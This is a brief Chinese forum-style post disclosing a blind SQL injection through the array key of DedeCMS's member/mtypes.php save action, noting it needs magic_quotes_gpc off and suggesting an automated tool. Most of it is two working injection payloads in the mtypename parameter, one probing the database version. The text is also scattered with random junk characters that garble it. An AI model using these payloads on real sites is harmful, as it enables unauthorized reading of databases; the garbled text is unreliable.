需要magic_quotes_gpc = Off,所以说是鸡肋啊.
4 m7 }, h& g' S2 x0 _" w. U6 n% \% f6 j# V
6 d/ d- L5 O. i发生在数组key里的注射漏洞,有点意思.- M j5 h/ Z. g* `. e' Q2 q
; v$ s; j! Q6 j' d7 w6 m5 f% G这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下, U, Z, A6 X/ _ A
. t/ q. Y8 i5 H" Y
http://www.xxx.com /dede/member/mtypes.php?dopost=save" a* C5 y0 u. G2 e
% w7 T. U8 ^* M$ R/ e; W$ Eexploit:
n" k+ r% T# Y3 P5 U, \mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
2 A6 B# A1 e* Q2 nmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r) J }1 _5 o; `0 Y
|